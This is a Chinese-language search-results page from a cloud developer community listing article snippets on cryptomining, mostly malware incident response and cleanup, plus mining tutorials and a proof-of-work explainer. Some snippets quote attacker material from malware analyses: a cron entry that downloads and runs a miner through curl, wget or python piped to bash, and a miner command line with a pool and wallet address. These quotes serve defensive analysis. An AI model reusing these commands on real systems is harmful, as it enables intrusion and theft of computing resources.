- 综合排序
- 最热优先
- 最新优先
- 来自专栏OneMoreThink的专栏
应急靶场(5):WindowsServer2022挖矿事件
四、挖矿程序的md5 排查后门,使用命令msinfo32打开系统信息,在软件环境->服务中,看到可疑服务:c3pool_miner。 其中xmrig是大名鼎鼎的门罗币挖矿程序。 使用命令certutil -hashfile xmrig.exe MD5计算出挖矿程序的md5值是A79D49F425F95E70DDF0C68C18ABC564。 使用命令certutil -hashfile systems.bat MD5计算后门脚本的md5值,得到:8414900F4C896964497C2CF6552EC4B9。 查看config.json文件的user参数,获得钱包地址:4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y
1.5K10编辑于 2024-10-15 - 来自专栏全栈程序员必看
eth挖矿软件_PI挖矿
geth –port 33333 –rpc –rpcapi eth –rpcaddr 192.168.10.176 –rpcport 8888 console 2 启动ethminer(挖矿软件 127.0.0.1:1234 –opencl-device 0 –opencl-platform 1 注意:只需要执行以上两步操作,不要添加其他参数或者启动后执行miner.start()操作 -G:启动GPU挖矿 (通过opencl调用GPU挖矿) -P:geth地址 –opencl-device x :x代表启动的Gpu数量,默认全部启动 注意:启动GPU挖矿需要geth节点设置为挖矿节点才可以启动挖矿,并且geth 的disk IO速度应该足够快,否则数据同步速度不能跟上主网区块产生速度,也无法挖矿.
2.2K30编辑于 2022-11-10 - 来自专栏全栈程序员必看
python挖矿脚本代码_一个挖矿脚本
遇到一台机器偶尔cpu使用率达到80%,触发告警。登录查看后一个sshd2程序导致cpu负载高
2.8K30编辑于 2022-09-14 - 来自专栏白安全组
挖矿木马详解
一分钟了解什么是挖矿木马 什么是挖矿木马? 攻击者通过各种手段将挖矿程序植入受害者的计算机中,在受害者不知情的情况下利用其计算机的云算力进行挖矿,从而获取利益,这类非法植入用户计算机的挖矿程序就是挖矿木马。 挖矿木马,挖的是啥? 互联网上开源的门罗币挖矿项目很多,方便使用; 5. 暗网支持门罗币交易。 为什么会中挖矿木马? 垃圾邮件:用户运行了钓鱼邮件中的附件。 网页挖矿 网页挖矿是指攻击者将挖矿木马植入正常网站,只要访问者通过浏览器浏览被恶意植入了网页挖矿木马站点,浏览器会即刻执行挖矿指令。 网页挖矿的主要特征为,访问挖矿站点时,CPU使用率会剧增,退出挖矿站点访问后,CPU使用率瞬间下降: 网页挖矿脚本的代码中通常会包含“miner”字符串,具有一定的辨识度: 驱动挖矿 驱动挖矿是指挖矿木马通过注册驱动的方式驻留在系统中以确保持久性
13.5K61发布于 2019-12-02 - 来自专栏全栈程序员必看
挖矿病毒分析
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/130081.html原文链接:https://javaforall.cn
1.4K10编辑于 2022-08-10 - 来自专栏全栈程序员必看
挖矿脚本学习
背景 日常应急响应过程中发现的挖矿脚本,对其进行分析发现写的质量该不错,可以学习下 样本分析及学习 SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin 209.141.40.190" fi #写入计划任务: 使用-e参数:激活转义字符 #前三个是吸入系统计划任务 #第四个是写入个人计划任务 #写入计划任务的内容就是以curl、wget、python的urllib2库 来下载挖矿样本到 /tmp/xms,并以bash来执行下载的挖矿样本。 之后再删除下载的挖矿样本/tmp/xms echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 计算命令 md5sum then sum=$(md5sum /tmp/dbused | awk '{ print $1 }') #计算abused的md5至
1.4K20编辑于 2022-09-07 - 来自专栏全栈程序员必看
kthreaddi挖矿病毒
今天上服务器一查看cpu被占满了,使用了top命令一看,好家伙看到 kthreaddi 进程占用cpu300% 老子气坏了,没碰见过,什么是kthreaddi 白百度了一圈,原来【 kthreaddi 】是挖矿病毒 果然有一条定时任务,更加可气的是找不到这个文件 解决办法:删除这条命名,然后又top命名 kill -9 PID 杀死进程 貌似解决了问题 但是过一会 又创建了进程,定时任务又被重新写入了 这次我就查看挖矿进程的执行文件链接
1.2K10编辑于 2022-08-25 - 来自专栏全栈程序员必看
挖矿病毒查杀
这两天使用的公网服务器被入侵了,而且感染了不止一种病毒:一种是 libudev.so,是 DDoS 的客户端,现象就是不停的向外网发包,也就是超目标发起 DDoS 攻击;另外一种是挖矿程序,除了发包之外 具体的文件名称可能会有所不同,大家要根据自己的情况对应修改,领外 /etc/rc*.d/ 的 S01* 文件都是指向 /etc/init.d/ 里的启动脚本的软链接,而且是从 rc1.d 一直到 rc5. XMR 挖矿程序 2.1 病毒特征 第二种病毒是门罗币(XMR)挖矿程序,门罗币似乎是今年年初涨得很快,所以用病毒入侵挖矿的手法也就出现了,病毒主要是通过下载脚本,运行后下载并启动挖矿程序来工作,脚本的内容如下 ,关于脚本的代码分析见于:XMR恶意挖矿案例简析,里面讲的非常详细。 参考资料 XMR恶意挖矿案例简析 金山云安珀实验室千里追踪75万台“肉鸡”控制源 记一次排除十字符libudev.so病毒的过程 FreeBuf 发布者:全栈程序员栈长,转载请注明出处:https://
2.7K10编辑于 2022-09-01 - 来自专栏全栈程序员必看
linux挖矿病毒工具,Linux服务器挖矿病毒
攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。 conns -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 tmp/conns -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 44xdB6UmabC8R69V6jDj7q1zGyDzJ7ks5GJpLs3b2HpqWwWq2xbvLKiRjmX8e9oy7426goZG9kXRTgHj9SZPGzfiQYtbTw1 tmp/conn /tmp/conn: PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced 首先下载了一个图片,然后通过dd提取出来挖矿程序 这种通过Redis未授权拿服务器挖矿的情况很常见。 处理过程 1)redis增加认证,清空/var/spool/cron/root和authorized_keys。
4K20编辑于 2022-06-30 - 来自专栏全栈程序员必看
挖矿病毒解决
、邮件、下载恶意软件(doc、rar、恶意源、docker、wget) 4、定位 如何传播:蠕虫、ssh弱口令、内网ip探测工具、大量exp、Linux本身免密登陆、root高权限程序劫持、sodo 5、 通过文件夹的创立时间快速推断出如何被感染 last登陆时间 last登陆失败的时间爆破的ip来定位出第一个中毒主机; –修复漏洞、清理后门、(关门,打狗) 6、防护策略-避免再犯同样问题–安全建议 IPtable吧挖矿常见端口全切断
67910编辑于 2022-07-01 - 来自专栏全栈程序员必看
排查挖矿病毒
而该269 进程则是挖矿病毒进行高度伪装,即使是kill 掉该进程也无济于事,后面又会自动跑起来。 58 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/8 常规做法 针对该挖矿病毒 ,一般常规做法是 1、查找出具体哪个进程导致占比CPU;比如269; 2、kill 掉该挖矿进程;sudo kill -9 48124; 3、通过关键词查找挖矿病毒,一般在/tmp 目录底下,如果不清楚查找 说明挖矿病毒是通过早期开放的外网22号端口进行入侵,然后别人用爆破的方式通过22端口植入病毒,root等账号密码被破解。 /agent_installer.sh 5、执行完成,终端的agent程序将自动连接EDR管理中心 通过云查杀病毒 口令检测 SSH策略检测 身份鉴别策略组检测 对一些已感染的文件进行隔离病毒
1.2K10编辑于 2022-07-01 - 来自专栏深入浅出区块链技术
比特币如何挖矿(挖矿原理)-工作量证明
在中本聪(比特币之父)的设计里,完成记账的节点可以获得系统给与的一定数量的比特币奖励,这个奖励的过程也就是比特币的发行过程,因此大家形象的把记账称为“挖矿”,本文将详细讨论这个过程。 如此大的计算量需要投入大量的计算设备、电力等, 目前应该没有单矿工独立参与挖矿了,基本都是由矿工联合起来组成矿池进行挖矿(矿池里的矿工按算力百分比来分收益)。 从经济的角度讲,只有挖矿还有收益(比特币价格不断上涨也让收益变大),就会有新的矿工加入,从而加剧竞争,提高算力难度,挖矿就需要耗费更多的运算和电力,相互作用引起最终成本会接近收益。 假如节点有任何的作弊行为,都会导致网络的节点验证不通过,直接丢弃其打包的区块,这个区块就无法记录到总账本中,作弊的节点耗费的成本就白费了,因此在巨大的挖矿成本下,也使得矿工自觉自愿的遵守比特币系统的共识协议
2.7K50发布于 2018-06-21 - 来自专栏腾讯云安全的专栏
云上挖矿如何预防?30秒看懂挖矿团伙8220
关注腾讯云安全获取更多资讯 点右下角的【好看】 做个更好看的人 var first_sceen__time = (+new Date());if ("" == 1 && document.getElementById('js_content')) { document.getElementById('js_content').addEventListener("selectstart",function(e){ e.preventDefault(); }); } (function(){ if
1.7K20发布于 2019-05-16 - 来自专栏全栈程序员必看
以太坊(ETH)挖矿最新教程_以太坊个人挖矿
以太坊(ETH)挖矿最新教程 目前网上的大多数以太坊挖矿教程是很早整理编写的,基本都已过时不适用了。 但挖矿是一个技术持续升级更新的过程,因此根据最新实战情况编写了本文,并争取在以后抽时间持续保持跟进更新。 一.基本要求 ETH 挖矿主要是使用显卡来挖矿。 其中显卡决定挖矿的速度,主板、电源在很大程度上决定了矿机运行的稳定程度。附两张矿机图: 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。
4.2K10编辑于 2022-11-04 - 来自专栏数据分析与挖掘
动态规划--矿工挖矿
动态规划三要素:边界、最优子问题、状态转移方程; 问题描述:现有10个矿工,5个金矿,每个金矿有对应金子和需要开采的人数,问你最多能够获得多少金子? ? 首先我们定义相应的参数: 矿工个数:n=10 金矿个数:w=5 金子数量:g=[400,500,200,300,350] 需要人数:p=[5,5,3,4,4] p[i]代表挖了第i个金矿所需人数,g[i -1),F(n-p[i],w-1)+g[i]) 表示n个人挖w个金矿能够得到的最大金子数=最大值(n个人挖w-1个金矿,((n-p[i])个人挖w-1个金矿)+g[i])) 最终代码: n=10 w=5 g=[400,500,200,300,350] p=[5,5,3,4,3] def goldMining(n,w,g,p): #初始化数组,用于存储信息,注意为了更好计算,共有11列,第一列作为辅助位
94820发布于 2020-08-26 - 来自专栏全栈程序员必看
linux——挖矿程序处理
记一次挖矿程序入侵以及解决实操! 1,过程记录 系统被挖矿程序入侵,导致系统CPU飙升。kill掉进程后自动重启。 3. pkill nanoWatch ,杀掉进程 4. service crond stop 或者 crontab -r 删除所有的执行计划 5.
2.7K20编辑于 2022-07-04 - 来自专栏全栈程序员必看
linux 中了挖矿病毒
文章目录 中毒特征磁盘cpu 跑满 100% 如何处理 反复发作 中毒特征磁盘cpu 跑满 100% 如何处理 电脑中了挖矿病毒 ps -aux | grep kinsing root 19447
2.6K10编辑于 2022-06-27 - 来自专栏全栈程序员必看
以太坊挖矿回报率_eth挖矿难度曲线
随着时间的推移,全网算力越来越大,挖矿难度越来越高,以太坊挖矿一天收益多少?那么怎么才能提高挖矿收益呢? 挖矿的最基本的物理条件就是得有一台运行稳定稳定的矿机,这个不在今天的讨论范围之内。 有了一台硬件条件过硬的矿机之后,只要做好一下两点,你就会比别人轻松高出3-5%的收益: 第一点:挖矿软件的选择。 如果你的卡是A卡的新型号,比如RX4xx和RX5xx系列,也就是Tahiti, Tonga, Ellesmere(rx570), Baffin(rx560)架构的,你一定要用最新版的原版,因为针对这些GPU 直接比有些拒绝率高达3-5%的矿池提高收益3-5%; 2、延时低。 以太坊挖矿机配置以太坊挖矿难度和收益以太坊挖矿收益计算以太坊挖矿以太坊挖矿一天收益多少以太坊价格行情以太坊官网 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。
2.1K10编辑于 2022-11-04 - 来自专栏元宇宙112
什么是DAPP挖矿?
众所周知,现在最大的挖矿不过是一些重复的计算,所有的项目方都想尽办法逃避“贪婪的用户”和羊毛军。 这也是现在“DAPP”挖矿的主要意图。 1000 (6).jpg 奖赏式挖矿:登录DAPP,能够取得一定的日常活泼或浏览奖赏,共享新用户能够取得奖赏。 当然,这也是现在最干流的方法。 2017年后,数字货币进入寒冬,比特币的传统挖矿职业也进入寒冬。各大电脑城都呈现了团体卖二手矿机拿回本钱的现象。 总结一下,这便是DAPP挖矿。有人用它来作为扩张地盘的奖赏,作为商场的品鉴品,有人用它来构建生态,真正用它。 哪个更好,要看谁真正处理了用户的实际问题。
1.2K20编辑于 2022-05-27 - 来自专栏全栈程序员必看
清除挖矿脚本 minerd
ps -eopcpu,args –sort=%cpu|head 找到飙高的程序是minerd
1.9K40编辑于 2022-09-14
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号